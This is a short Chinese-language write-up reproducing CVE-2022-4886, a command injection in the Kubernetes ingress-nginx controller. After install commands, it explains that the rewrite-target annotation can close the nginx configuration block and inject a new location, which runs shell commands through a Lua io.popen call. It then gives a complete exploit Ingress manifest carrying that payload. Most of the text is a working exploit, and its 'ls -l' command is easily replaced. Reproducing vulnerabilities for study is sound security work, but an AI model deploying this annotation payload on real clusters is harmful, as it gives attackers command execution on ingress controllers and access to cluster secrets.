CVE-2022-4886 ingress命令注入复现与分析
安装
安装ingress-nginx
wget https://raw.githubusercontent.com/kubernetes/ingress-nginx/controller-v1.8.4/deploy/static/provider/cloud/deploy.yaml
k apply -f deploy.yaml原理
nginx.ingress.kubernetes.io/rewrite-target标签会在nginx配置进行插入字符串,我们通过注入自己的恶意字符串,并且进行闭合,并且利用了lua脚本执行命令的功能,即可注入一个执行命令的路由来完成执行命令
nginx.ingress.kubernetes.io/rewrite-target: |
execute-command/ last; #用于将所有请求重定向到/execute-command
}
#注入了一个新路径,用于通过lua脚本执行命令
location execute-command/ {
content_by_lua_block {
local handle = io.popen("ls -l")
local result = handle:read("*a")
handle:close()
ngx.say(result)
}
}
location /fs/{
演示
部署的ingress如下所示
apiVersion: networking.k8s.io/v1
kind: Ingress
metadata:
name: ingress-exploit
annotations:
kubernetes.io/ingress.class: "nginx"
nginx.ingress.kubernetes.io/rewrite-target: |
execute-command/ last;
}
location execute-command/ {
content_by_lua_block {
local handle = io.popen("ls -l")
local result = handle:read("*a")
handle:close()
ngx.say(result)
}
}
location /fs/{
spec:
rules:
- host: k8s.evil.me
http:
paths:
- path: /
pathType: Prefix
backend:
service:
name: exploit
port:
number: 8080